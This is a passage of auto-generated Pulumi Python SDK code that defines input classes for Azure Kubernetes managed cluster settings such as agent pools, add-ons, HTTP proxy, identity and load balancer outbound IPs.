:param pulumi.Input[bool] enable_private_cluster: Whether to create the cluster as a private cluster or not.
:param pulumi.Input[str] private_dns_zone: Private dns zone mode for private cluster.
"""
if authorized_ip_ranges is not None:
pulumi.set(__self__, "authorized_ip_ranges", authorized_ip_ranges)
if enable_private_cluster is not None:
pulumi.set(__self__, "enable_private_cluster", enable_private_cluster)
if private_dns_zone is not None:
pulumi.set(__self__, "private_dns_zone", private_dns_zone)
@property
@pulumi.getter(name="authorizedIPRanges")
def authorized_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Authorized IP Ranges to kubernetes API server.
"""
return pulumi.get(self, "authorized_ip_ranges")
@authorized_ip_ranges.setter
def authorized_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_ip_ranges", value)
@property
@pulumi.getter(name="enablePrivateCluster")
def enable_private_cluster(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to create the cluster as a private cluster or not.
"""
return pulumi.get(self, "enable_private_cluster")
@enable_private_cluster.setter
def enable_private_cluster(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_private_cluster", value)
@property
@pulumi.getter(name="privateDNSZone")
def private_dns_zone(self) -> Optional[pulumi.Input[str]]:
"""
Private dns zone mode for private cluster.
"""
return pulumi.get(self, "private_dns_zone")
@private_dns_zone.setter
def private_dns_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_dns_zone", value)
@pulumi.input_type
class ManagedClusterAddonProfileArgs:
def __init__(__self__, *,
enabled: pulumi.Input[bool],
config: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
A Kubernetes add-on profile for a managed cluster.
:param pulumi.Input[bool] enabled: Whether the add-on is enabled or not.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] config: Key-value pairs for configuring an add-on.
"""
pulumi.set(__self__, "enabled", enabled)
if config is not None:
pulumi.set(__self__, "config", config)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
Whether the add-on is enabled or not.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value pairs for configuring an add-on.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "config", value)
@pulumi.input_type
class ManagedClusterAgentPoolProfileArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
count: Optional[pulumi.Input[int]] = None,
enable_auto_scaling: Optional[pulumi.Input[bool]] = None,
enable_encryption_at_host: Optional[pulumi.Input[bool]] = None,
enable_fips: Optional[pulumi.Input[bool]] = None,
enable_node_public_ip: Optional[pulumi.Input[bool]] = None,
gpu_instance_profile: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]] = None,
kubelet_config: Optional[pulumi.Input['KubeletConfigArgs']] = None,
kubelet_disk_type: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]] = None,
linux_os_config: Optional[pulumi.Input['LinuxOSConfigArgs']] = None,
max_count: Optional[pulumi.Input[int]] = None,
max_pods: Optional[pulumi.Input[int]] = None,
min_count: Optional[pulumi.Input[int]] = None,
mode: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]] = None,
node_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
node_public_ip_prefix_id: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
orchestrator_version: Optional[pulumi.Input[str]] = None,
os_disk_size_gb: Optional[pulumi.Input[int]] = None,
os_disk_type: Optional[pulumi.Input[Union[str, 'OSDiskType']]] = None,
os_sku: Optional[pulumi.Input[Union[str, 'OSSKU']]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
pod_subnet_id: Optional[pulumi.Input[str]] = None,
proximity_placement_group_id: Optional[pulumi.Input[str]] = None,
scale_set_eviction_policy: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]] = None,
scale_set_priority: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]] = None,
spot_max_price: Optional[pulumi.Input[float]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[Union[str, 'AgentPoolType']]] = None,
upgrade_settings: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']] = None,
vm_size: Optional[pulumi.Input[str]] = None,
vnet_subnet_id: Optional[pulumi.Input[str]] = None):
"""
Profile for the container service agent pool.
:param pulumi.Input[str] name: Unique name of the agent pool profile in the context of the subscription and resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: Availability zones for nodes. Must use VirtualMachineScaleSets AgentPoolType.
:param pulumi.Input[int] count: Number of agents (VMs) to host docker containers. Allowed values must be in the range of 0 to 100 (inclusive) for user pools and in the range of 1 to 100 (inclusive) for system pools. The default value is 1.
:param pulumi.Input[bool] enable_auto_scaling: Whether to enable auto-scaler
:param pulumi.Input[bool] enable_encryption_at_host: Whether to enable EncryptionAtHost
:param pulumi.Input[bool] enable_fips: Whether to use FIPS enabled OS
:param pulumi.Input[bool] enable_node_public_ip: Enable public IP for nodes
:param pulumi.Input[Union[str, 'GPUInstanceProfile']] gpu_instance_profile: GPUInstanceProfile to be used to specify GPU MIG instance profile for supported GPU VM SKU. Supported values are MIG1g, MIG2g, MIG3g, MIG4g and MIG7g.
:param pulumi.Input['KubeletConfigArgs'] kubelet_config: KubeletConfig specifies the configuration of kubelet on agent nodes.
:param pulumi.Input[Union[str, 'KubeletDiskType']] kubelet_disk_type: KubeletDiskType determines the placement of emptyDir volumes, container runtime data root, and Kubelet ephemeral storage. Currently allows one value, OS, resulting in Kubelet using the OS disk for data.
:param pulumi.Input['LinuxOSConfigArgs'] linux_os_config: LinuxOSConfig specifies the OS configuration of linux agent nodes.
:param pulumi.Input[int] max_count: Maximum number of nodes for auto-scaling
:param pulumi.Input[int] max_pods: Maximum number of pods that can run on a node.
:param pulumi.Input[int] min_count: Minimum number of nodes for auto-scaling
:param pulumi.Input[Union[str, 'AgentPoolMode']] mode: AgentPoolMode represents mode of an agent pool
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_labels: Agent pool node labels to be persisted across all nodes in agent pool.
:param pulumi.Input[str] node_public_ip_prefix_id: Public IP Prefix ID. VM nodes use IPs assigned from this Public IP Prefix.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_taints: Taints added to new nodes during node pool create and scale. For example, key=value:NoSchedule.
:param pulumi.Input[str] orchestrator_version: Version of orchestrator specified when creating the managed cluster.
:param pulumi.Input[int] os_disk_size_gb: OS Disk Size in GB to be used to specify the disk size for every machine in this master/agent pool. If you specify 0, it will apply the default osDisk size according to the vmSize specified.
:param pulumi.Input[Union[str, 'OSDiskType']] os_disk_type: OS disk type to be used for machines in a given agent pool. Allowed values are 'Ephemeral' and 'Managed'. If unspecified, defaults to 'Ephemeral' when the VM supports ephemeral OS and has a cache disk larger than the requested OSDiskSizeGB. Otherwise, defaults to 'Managed'. May not be changed after creation.
:param pulumi.Input[Union[str, 'OSSKU']] os_sku: OsSKU to be used to specify os sku. Choose from Ubuntu(default) and CBLMariner for Linux OSType. Not applicable to Windows OSType.
:param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
:param pulumi.Input[str] pod_subnet_id: Pod SubnetID specifies the VNet's subnet identifier for pods.
:param pulumi.Input[str] proximity_placement_group_id: The ID for Proximity Placement Group.
:param pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']] scale_set_eviction_policy: ScaleSetEvictionPolicy to be used to specify eviction policy for Spot virtual machine scale set. Default to Delete.
:param pulumi.Input[Union[str, 'ScaleSetPriority']] scale_set_priority: ScaleSetPriority to be used to specify virtual machine scale set priority. Default to regular.
:param pulumi.Input[float] spot_max_price: SpotMaxPrice to be used to specify the maximum price you are willing to pay in US Dollars. Possible values are any decimal value greater than zero or -1 which indicates default price to be up-to on-demand.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Agent pool tags to be persisted on the agent pool virtual machine scale set.
:param pulumi.Input[Union[str, 'AgentPoolType']] type: AgentPoolType represents types of an agent pool
:param pulumi.Input['AgentPoolUpgradeSettingsArgs'] upgrade_settings: Settings for upgrading the agentpool
:param pulumi.Input[str] vm_size: Size of agent VMs.
:param pulumi.Input[str] vnet_subnet_id: VNet SubnetID specifies the VNet's subnet identifier for nodes and maybe pods
"""
pulumi.set(__self__, "name", name)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if count is not None:
pulumi.set(__self__, "count", count)
if enable_auto_scaling is not None:
pulumi.set(__self__, "enable_auto_scaling", enable_auto_scaling)
if enable_encryption_at_host is not None:
pulumi.set(__self__, "enable_encryption_at_host", enable_encryption_at_host)
if enable_fips is not None:
pulumi.set(__self__, "enable_fips", enable_fips)
if enable_node_public_ip is not None:
pulumi.set(__self__, "enable_node_public_ip", enable_node_public_ip)
if gpu_instance_profile is not None:
pulumi.set(__self__, "gpu_instance_profile", gpu_instance_profile)
if kubelet_config is not None:
pulumi.set(__self__, "kubelet_config", kubelet_config)
if kubelet_disk_type is not None:
pulumi.set(__self__, "kubelet_disk_type", kubelet_disk_type)
if linux_os_config is not None:
pulumi.set(__self__, "linux_os_config", linux_os_config)
if max_count is not None:
pulumi.set(__self__, "max_count", max_count)
if max_pods is not None:
pulumi.set(__self__, "max_pods", max_pods)
if min_count is not None:
pulumi.set(__self__, "min_count", min_count)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if node_labels is not None:
pulumi.set(__self__, "node_labels", node_labels)
if node_public_ip_prefix_id is not None:
pulumi.set(__self__, "node_public_ip_prefix_id", node_public_ip_prefix_id)
if node_taints is not None:
pulumi.set(__self__, "node_taints", node_taints)
if orchestrator_version is not None:
pulumi.set(__self__, "orchestrator_version", orchestrator_version)
if os_disk_size_gb is not None:
pulumi.set(__self__, "os_disk_size_gb", os_disk_size_gb)
if os_disk_type is not None:
pulumi.set(__self__, "os_disk_type", os_disk_type)
if os_sku is not None:
pulumi.set(__self__, "os_sku", os_sku)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if pod_subnet_id is not None:
pulumi.set(__self__, "pod_subnet_id", pod_subnet_id)
if proximity_placement_group_id is not None:
pulumi.set(__self__, "proximity_placement_group_id", proximity_placement_group_id)
if scale_set_eviction_policy is not None:
pulumi.set(__self__, "scale_set_eviction_policy", scale_set_eviction_policy)
if scale_set_priority is not None:
pulumi.set(__self__, "scale_set_priority", scale_set_priority)
if spot_max_price is not None:
pulumi.set(__self__, "spot_max_price", spot_max_price)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if type is not None:
pulumi.set(__self__, "type", type)
if upgrade_settings is not None:
pulumi.set(__self__, "upgrade_settings", upgrade_settings)
if vm_size is not None:
pulumi.set(__self__, "vm_size", vm_size)
if vnet_subnet_id is not None:
pulumi.set(__self__, "vnet_subnet_id", vnet_subnet_id)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Unique name of the agent pool profile in the context of the subscription and resource group.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Availability zones for nodes. Must use VirtualMachineScaleSets AgentPoolType.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[int]]:
"""
Number of agents (VMs) to host docker containers. Allowed values must be in the range of 0 to 100 (inclusive) for user pools and in the range of 1 to 100 (inclusive) for system pools. The default value is 1.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="enableAutoScaling")
def enable_auto_scaling(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable auto-scaler
"""
return pulumi.get(self, "enable_auto_scaling")
@enable_auto_scaling.setter
def enable_auto_scaling(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_auto_scaling", value)
@property
@pulumi.getter(name="enableEncryptionAtHost")
def enable_encryption_at_host(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable EncryptionAtHost
"""
return pulumi.get(self, "enable_encryption_at_host")
@enable_encryption_at_host.setter
def enable_encryption_at_host(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_encryption_at_host", value)
@property
@pulumi.getter(name="enableFIPS")
def enable_fips(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to use FIPS enabled OS
"""
return pulumi.get(self, "enable_fips")
@enable_fips.setter
def enable_fips(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_fips", value)
@property
@pulumi.getter(name="enableNodePublicIP")
def enable_node_public_ip(self) -> Optional[pulumi.Input[bool]]:
"""
Enable public IP for nodes
"""
return pulumi.get(self, "enable_node_public_ip")
@enable_node_public_ip.setter
def enable_node_public_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_node_public_ip", value)
@property
@pulumi.getter(name="gpuInstanceProfile")
def gpu_instance_profile(self) -> Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]]:
"""
GPUInstanceProfile to be used to specify GPU MIG instance profile for supported GPU VM SKU. Supported values are MIG1g, MIG2g, MIG3g, MIG4g and MIG7g.
"""
return pulumi.get(self, "gpu_instance_profile")
@gpu_instance_profile.setter
def gpu_instance_profile(self, value: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]]):
pulumi.set(self, "gpu_instance_profile", value)
@property
@pulumi.getter(name="kubeletConfig")
def kubelet_config(self) -> Optional[pulumi.Input['KubeletConfigArgs']]:
"""
KubeletConfig specifies the configuration of kubelet on agent nodes.
"""
return pulumi.get(self, "kubelet_config")
@kubelet_config.setter
def kubelet_config(self, value: Optional[pulumi.Input['KubeletConfigArgs']]):
pulumi.set(self, "kubelet_config", value)
@property
@pulumi.getter(name="kubeletDiskType")
def kubelet_disk_type(self) -> Optional[pulumi.Input[Union[str, 'KubeletDiskType']]]:
"""
KubeletDiskType determines the placement of emptyDir volumes, container runtime data root, and Kubelet ephemeral storage. Currently allows one value, OS, resulting in Kubelet using the OS disk for data.
"""
return pulumi.get(self, "kubelet_disk_type")
@kubelet_disk_type.setter
def kubelet_disk_type(self, value: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]]):
pulumi.set(self, "kubelet_disk_type", value)
@property
@pulumi.getter(name="linuxOSConfig")
def linux_os_config(self) -> Optional[pulumi.Input['LinuxOSConfigArgs']]:
"""
LinuxOSConfig specifies the OS configuration of linux agent nodes.
"""
return pulumi.get(self, "linux_os_config")
@linux_os_config.setter
def linux_os_config(self, value: Optional[pulumi.Input['LinuxOSConfigArgs']]):
pulumi.set(self, "linux_os_config", value)
@property
@pulumi.getter(name="maxCount")
def max_count(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of nodes for auto-scaling
"""
return pulumi.get(self, "max_count")
@max_count.setter
def max_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_count", value)
@property
@pulumi.getter(name="maxPods")
def max_pods(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of pods that can run on a node.
"""
return pulumi.get(self, "max_pods")
@max_pods.setter
def max_pods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_pods", value)
@property
@pulumi.getter(name="minCount")
def min_count(self) -> Optional[pulumi.Input[int]]:
"""
Minimum number of nodes for auto-scaling
"""
return pulumi.get(self, "min_count")
@min_count.setter
def min_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_count", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolMode']]]:
"""
AgentPoolMode represents mode of an agent pool
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter(name="nodeLabels")
def node_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Agent pool node labels to be persisted across all nodes in agent pool.
"""
return pulumi.get(self, "node_labels")
@node_labels.setter
def node_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "node_labels", value)
@property
@pulumi.getter(name="nodePublicIPPrefixID")
def node_public_ip_prefix_id(self) -> Optional[pulumi.Input[str]]:
"""
Public IP Prefix ID. VM nodes use IPs assigned from this Public IP Prefix.
"""
return pulumi.get(self, "node_public_ip_prefix_id")
@node_public_ip_prefix_id.setter
def node_public_ip_prefix_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_public_ip_prefix_id", value)
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Taints added to new nodes during node pool create and scale. For example, key=value:NoSchedule.
"""
return pulumi.get(self, "node_taints")
@node_taints.setter
def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "node_taints", value)
@property
@pulumi.getter(name="orchestratorVersion")
def orchestrator_version(self) -> Optional[pulumi.Input[str]]:
"""
Version of orchestrator specified when creating the managed cluster.
"""
return pulumi.get(self, "orchestrator_version")
@orchestrator_version.setter
def orchestrator_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "orchestrator_version", value)
@property
@pulumi.getter(name="osDiskSizeGB")
def os_disk_size_gb(self) -> Optional[pulumi.Input[int]]:
"""
OS Disk Size in GB to be used to specify the disk size for every machine in this master/agent pool. If you specify 0, it will apply the default osDisk size according to the vmSize specified.
"""
return pulumi.get(self, "os_disk_size_gb")
@os_disk_size_gb.setter
def os_disk_size_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "os_disk_size_gb", value)
@property
@pulumi.getter(name="osDiskType")
def os_disk_type(self) -> Optional[pulumi.Input[Union[str, 'OSDiskType']]]:
"""
OS disk type to be used for machines in a given agent pool. Allowed values are 'Ephemeral' and 'Managed'. If unspecified, defaults to 'Ephemeral' when the VM supports ephemeral OS and has a cache disk larger than the requested OSDiskSizeGB. Otherwise, defaults to 'Managed'. May not be changed after creation.
"""
return pulumi.get(self, "os_disk_type")
@os_disk_type.setter
def os_disk_type(self, value: Optional[pulumi.Input[Union[str, 'OSDiskType']]]):
pulumi.set(self, "os_disk_type", value)
@property
@pulumi.getter(name="osSKU")
def os_sku(self) -> Optional[pulumi.Input[Union[str, 'OSSKU']]]:
"""
OsSKU to be used to specify os sku. Choose from Ubuntu(default) and CBLMariner for Linux OSType. Not applicable to Windows OSType.
"""
return pulumi.get(self, "os_sku")
@os_sku.setter
def os_sku(self, value: Optional[pulumi.Input[Union[str, 'OSSKU']]]):
pulumi.set(self, "os_sku", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
"""
OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: Optional[pulumi.Input[Union[str, 'OSType']]]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="podSubnetID")
def pod_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
Pod SubnetID specifies the VNet's subnet identifier for pods.
"""
return pulumi.get(self, "pod_subnet_id")
@pod_subnet_id.setter
def pod_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pod_subnet_id", value)
@property
@pulumi.getter(name="proximityPlacementGroupID")
def proximity_placement_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID for Proximity Placement Group.
"""
return pulumi.get(self, "proximity_placement_group_id")
@proximity_placement_group_id.setter
def proximity_placement_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proximity_placement_group_id", value)
@property
@pulumi.getter(name="scaleSetEvictionPolicy")
def scale_set_eviction_policy(self) -> Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]]:
"""
ScaleSetEvictionPolicy to be used to specify eviction policy for Spot virtual machine scale set. Default to Delete.
"""
return pulumi.get(self, "scale_set_eviction_policy")
@scale_set_eviction_policy.setter
def scale_set_eviction_policy(self, value: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]]):
pulumi.set(self, "scale_set_eviction_policy", value)
@property
@pulumi.getter(name="scaleSetPriority")
def scale_set_priority(self) -> Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]]:
"""
ScaleSetPriority to be used to specify virtual machine scale set priority. Default to regular.
"""
return pulumi.get(self, "scale_set_priority")
@scale_set_priority.setter
def scale_set_priority(self, value: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]]):
pulumi.set(self, "scale_set_priority", value)
@property
@pulumi.getter(name="spotMaxPrice")
def spot_max_price(self) -> Optional[pulumi.Input[float]]:
"""
SpotMaxPrice to be used to specify the maximum price you are willing to pay in US Dollars. Possible values are any decimal value greater than zero or -1 which indicates default price to be up-to on-demand.
"""
return pulumi.get(self, "spot_max_price")
@spot_max_price.setter
def spot_max_price(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "spot_max_price", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Agent pool tags to be persisted on the agent pool virtual machine scale set.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:
"""
AgentPoolType represents types of an agent pool
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'AgentPoolType']]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="upgradeSettings")
def upgrade_settings(self) -> Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']]:
"""
Settings for upgrading the agentpool
"""
return pulumi.get(self, "upgrade_settings")
@upgrade_settings.setter
def upgrade_settings(self, value: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']]):
pulumi.set(self, "upgrade_settings", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> Optional[pulumi.Input[str]]:
"""
Size of agent VMs.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="vnetSubnetID")
def vnet_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
VNet SubnetID specifies the VNet's subnet identifier for nodes and maybe pods
"""
return pulumi.get(self, "vnet_subnet_id")
@vnet_subnet_id.setter
def vnet_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vnet_subnet_id", value)
@pulumi.input_type
class ManagedClusterAutoUpgradeProfileArgs:
def __init__(__self__, *,
upgrade_channel: Optional[pulumi.Input[Union[str, 'UpgradeChannel']]] = None):
"""
Auto upgrade profile for a managed cluster.
:param pulumi.Input[Union[str, 'UpgradeChannel']] upgrade_channel: upgrade channel for auto upgrade.
"""
if upgrade_channel is not None:
pulumi.set(__self__, "upgrade_channel", upgrade_channel)
@property
@pulumi.getter(name="upgradeChannel")
def upgrade_channel(self) -> Optional[pulumi.Input[Union[str, 'UpgradeChannel']]]:
"""
upgrade channel for auto upgrade.
"""
return pulumi.get(self, "upgrade_channel")
@upgrade_channel.setter
def upgrade_channel(self, value: Optional[pulumi.Input[Union[str, 'UpgradeChannel']]]):
pulumi.set(self, "upgrade_channel", value)
@pulumi.input_type
class ManagedClusterHTTPProxyConfigArgs:
def __init__(__self__, *,
http_proxy: Optional[pulumi.Input[str]] = None,
https_proxy: Optional[pulumi.Input[str]] = None,
no_proxy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
trusted_ca: Optional[pulumi.Input[str]] = None):
"""
Configurations for provisioning the cluster with HTTP proxy servers.
:param pulumi.Input[str] http_proxy: HTTP proxy server endpoint to use.
:param pulumi.Input[str] https_proxy: HTTPS proxy server endpoint to use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] no_proxy: Endpoints that should not go through proxy.
:param pulumi.Input[str] trusted_ca: Alternative CA cert to use for connecting to proxy servers.
"""
if http_proxy is not None:
pulumi.set(__self__, "http_proxy", http_proxy)
if https_proxy is not None:
pulumi.set(__self__, "https_proxy", https_proxy)
if no_proxy is not None:
pulumi.set(__self__, "no_proxy", no_proxy)
if trusted_ca is not None:
pulumi.set(__self__, "trusted_ca", trusted_ca)
@property
@pulumi.getter(name="httpProxy")
def http_proxy(self) -> Optional[pulumi.Input[str]]:
"""
HTTP proxy server endpoint to use.
"""
return pulumi.get(self, "http_proxy")
@http_proxy.setter
def http_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_proxy", value)
@property
@pulumi.getter(name="httpsProxy")
def https_proxy(self) -> Optional[pulumi.Input[str]]:
"""
HTTPS proxy server endpoint to use.
"""
return pulumi.get(self, "https_proxy")
@https_proxy.setter
def https_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https_proxy", value)
@property
@pulumi.getter(name="noProxy")
def no_proxy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Endpoints that should not go through proxy.
"""
return pulumi.get(self, "no_proxy")
@no_proxy.setter
def no_proxy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "no_proxy", value)
@property
@pulumi.getter(name="trustedCa")
def trusted_ca(self) -> Optional[pulumi.Input[str]]:
"""
Alternative CA cert to use for connecting to proxy servers.
"""
return pulumi.get(self, "trusted_ca")
@trusted_ca.setter
def trusted_ca(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "trusted_ca", value)
@pulumi.input_type
class ManagedClusterIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None,
user_assigned_identities: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Identity for the managed cluster.
:param pulumi.Input['ResourceIdentityType'] type: The type of identity used for the managed cluster. Type 'SystemAssigned' will use an implicitly created identity in master components and an auto-created user assigned identity in MC_ resource group in agent nodes. Type 'None' will not use MSI for the managed cluster, service principal will be used instead.
:param pulumi.Input[Mapping[str, Any]] user_assigned_identities: The user identity associated with the managed cluster. This identity will be used in control plane and only one user assigned identity is allowed. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
if type is not None:
pulumi.set(__self__, "type", type)
if user_assigned_identities is not None:
pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The type of identity used for the managed cluster. Type 'SystemAssigned' will use an implicitly created identity in master components and an auto-created user assigned identity in MC_ resource group in agent nodes. Type 'None' will not use MSI for the managed cluster, service principal will be used instead.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userAssignedIdentities")
def user_assigned_identities(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The user identity associated with the managed cluster. This identity will be used in control plane and only one user assigned identity is allowed. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
return pulumi.get(self, "user_assigned_identities")
@user_assigned_identities.setter
def user_assigned_identities(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "user_assigned_identities", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs:
def __init__(__self__, *,
count: Optional[pulumi.Input[int]] = None):
"""
Desired managed outbound IPs for the cluster load balancer.
:param pulumi.Input[int] count: Desired number of outbound IP created/managed by Azure for the cluster load balancer. Allowed values must be in the range of 1 to 100 (inclusive). The default value is 1.
"""
if count is None:
count = 1
if count is not None:
pulumi.set(__self__, "count", count)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[int]]:
"""
Desired number of outbound IP created/managed by Azure for the cluster load balancer. Allowed values must be in the range of 1 to 100 (inclusive). The default value is 1.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "count", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs:
def __init__(__self__, *,
public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None):
"""
Desired outbound IP Prefix resources for the cluster load balancer.
:param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] public_ip_prefixes: A list of public IP prefix resources.
"""
if public_ip_prefixes is not None:
pulumi.set(__self__, "public_ip_prefixes", public_ip_prefixes)
@property
@pulumi.getter(name="publicIPPrefixes")
def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
"""
A list of public IP prefix resources.
"""
